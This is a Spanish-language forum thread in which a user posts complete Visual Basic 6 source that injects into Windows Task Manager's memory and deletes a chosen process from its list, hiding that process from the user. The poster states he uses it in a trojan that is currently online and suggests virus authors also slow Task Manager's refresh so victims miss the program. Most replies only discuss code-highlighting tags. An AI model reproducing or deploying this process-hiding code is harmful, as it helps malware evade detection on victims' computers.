[Source-Actualisado] Jodiendo el Administrador de Tareas...

[BlackZeroX]

Este codigo lo ocupo en un troyano que tengo Online actualmente. aca el codigo

Se agradese a quien lo aya hecho ja

Lo que hace este codigo es secillo y es:

Código [Seleccionar] Expandir


Localisar primero el Administrador de tareas
Enlistar todo y cada uno de sus controles ' Asi lo entendi yo ok
localisar la lista de los procesos y despues quitar el proceso indicado... en este caso el notepad.exe


Actualisado....

En un Formulario comun poner solo esto y nada Mas...

Código (vb) [Seleccionar] Expandir


Private WithEvents Timer1 As Timer
Private Sub Form_Load()
    MsgBox "Ejecuta el Administrador de Tareas... [ Control + Alt + Supr ]"
    Shell "c:\windows\system32\notepad.exe", vbNormalFocus
    Set Timer1 = Me.Controls.Add("vb.timer", "Timer")
    Timer1.Interval = 1000
    Timer1.Enabled = True
End Sub
Private Sub Timer1_Timer()
    Dim hWnd1 As Long
    hWnd1 = FindWindow(vbNullString, "Administrador de tareas de Windows")
    HandleW = hWnd1
    If (hWnd1 <= 0) Then
        Caption = "No se ha encontrado el administrador de tareas"
    Else
        Caption = "Se ha encontrado el administrador de tareas"
        EnumChildWindows hWnd1, AddressOf Procesitos, 1 'lParam
    End If
End Sub



En un Modulo poner esto otro...

Código (vb) [Seleccionar] Expandir


Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long


Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Const PROCESS_VM_OPERATION = &H8
Const PROCESS_VM_READ = &H10
Const PROCESS_VM_WRITE = &H20
Const PROCESS_ALL_ACCESS = 0
Private Const PAGE_READWRITE = &H4&

Const MEM_COMMIT = &H1000
Const MEM_RESERVE = &H2000
Const MEM_DECOMMIT = &H4000
Const MEM_RELEASE = &H8000
Const MEM_FREE = &H10000
Const MEM_PRIVATE = &H20000
Const MEM_MAPPED = &H40000
Const MEM_TOP_DOWN = &H100000

Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private ASDQWEZXC As String

Private Const LVM_FIRST = &H1000
Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)

Private Const LVM_GETITEMW = (LVM_FIRST + 75)
Private Const LVIF_TEXT = &H1
Private Const LVM_DELETEITEM = 4104

Public Type LV_ITEM
    mask As Long
    iItem As Long
    iSubItem As Long
    state As Long
    stateMask As Long
    lpszText As Long 'LPCSTR
    cchTextMax As Long
    iImage As Long
    lParam As Long
    iIndent As Long
End Type

Type LV_TEXT
    sItemText As String * 80
End Type

Public Function Procesitos(ByVal hWnd2 As Long, lParam As String) As Boolean
Dim Nombre As String * 255, nombreClase As String * 255
Dim Nombre2 As String, nombreClase2 As String
Dim X As Long, Y As Long
X = GetWindowText(hWnd2, Nombre, 255)
Y = GetClassName(hWnd2, nombreClase, 255)

Nombre = Left(Nombre, X)
nombreClase = Left(nombreClase, Y)
Nombre2 = Trim(Nombre)
nombreClase2 = Trim(nombreClase)
If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
   JodeLosItems (hWnd2)
   Exit Function
End If
If Nombre2 = "" And nombreClase2 = "" Then
Procesitos = False
Else
Procesitos = True
End If
End Function

Public Function JodeLosItems(ByVal hListView As Long) ' As Variant
   Dim pid As Long, tid As Long
   Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
   Dim DirMemComp As Long, dwTam As Long
   Dim DirMemComp2 As Long
   Dim sLVItems() As String
   Dim li As LV_ITEM
   Dim lt As LV_TEXT
   If hListView = 0 Then Exit Function
   tid = GetWindowThreadProcessId(hListView, pid)
   nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
   If nElem = 0 Then Exit Function
   ReDim sLVItems(nElem - 1)
   li.cchTextMax = 80
   dwTam = Len(li)
      DirMemComp = DameMemComp(pid, dwTam, hProceso)
      DirMemComp2 = DameMemComp(pid, LenB(lt), hProceso)
      For i = 0 To nElem - 1
          li.lpszText = DirMemComp2
          li.cchTextMax = 80
          li.iItem = i
          li.mask = LVIF_TEXT
          WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
          lt.sItemText = Space(80)
          WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
          Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
          Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
          '''ASDQWEZXC = TrimNull(StrConv(lt.sItemText, vbFromUnicode))
          '''Form1.Text1.Text = Form1.Text1.Text & vbCrLf & TrimNull(StrConv(lt.sItemText, vbFromUnicode))
          '''If Len(Form1.Text1.Text) >= 10000 Then Form1.Text1.Text = ""
         
          If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = "notepad.exe" Then '<===========CAMBIAR
           Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
           '''Form1.Text2 = i
           Exit Function
          End If
      Next i
      AdiosMemComp hProceso, DirMemComp, dwTam
      AdiosMemComp hProceso, DirMemComp2, LenB(lt)
End Function

Public Function DameMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
    hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
    DameMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
End Function

Public Sub AdiosMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
   Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
   CloseHandle hProceso
End Sub
Public Function TrimNull(jaja As String) As String
   Dim pos As Integer
   pos = InStr(jaja, Chr$(0))
   If pos Then
      TrimNull = Left$(jaja, pos - 1)
      Exit Function
   End If
   TrimNull = jaja
End Function


Se entiende cuando se ejecuta por partes y muestra los resultados en pantalla asi lo entendi todo.

a si si lo usan para algun virus o algo no se otambien cambienle la prioridad al Administrador de Tareas en el momento... o modifiquen el codigo para que el refresco del Administrador de Tareas sea subitamente lento xP y no cachen el programa atiempo JOJOJO

PD.: Se ve bien a color no jaja, a y Reafirmo se agradece aquien lo aya hecho

[cassiani]

PD.: Se ve bien a color no jaja,

Claro, claro, para eso se hicieron las etiquetas de GeShi 

No hace falta que te esfuerces tanto sombrea todo el code y le agregas la etiqueta seleccionando en el combo "GeShi" o editas la etiqueta code después de agregarla ==> code=vb 

[BlackZeroX]

PD.: Se ve bien a color no jaja,

Claro, claro, para eso se hicieron las etiquetas de GeShi 

No hace falta que te esfuerces tanto sombrea todo el code y le agregas la etiqueta seleccionando en el combo "GeShi" o editas la etiqueta code después de agregarla ==> code=vb 

no me esforce en nada de nada ya que un programa que hice hace tiempo para pasar mis codigos de vb6 a html lo hace por mi solo lo modifique un poco para que en vez de Font color=.... etc sea [Color=... etc jaja ningun esfuerzo de nada en nada

[‭‭‭‭jackl007]

1. que hace el codigo? desactiva el adm. de tareas? 
2. no es mas facil y mucho mejor esto:

Código [Seleccionar] Expandir

[code=vb]'Codigo[/code ]


.....[/code]



osea por ejemplo:

Código (vb) [Seleccionar] Expandir

Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long


[seba123neo]

aparte de todo lo que dijeron....esta mal coloreado....

[JmHk]

Los seres humano nos somos perfectos

[d(-_-)b]

Porque te complicas la vida coloreando el code, no crees que seria mejor y mas facil usar el GeSHi 

saludos...

[BlackZeroX]

Los seres humano nos somos perfectos

Aaa si eso es cierto no sabia eso de Code=vb  jaja sorry ya lo edite bueno edito el 1er post y añado el codigo modificado para que lo vean mejor en ejecucion...

[JmHk]

ok mucho mejor

[‭‭‭‭jackl007]

y que hace el codigo? exactamente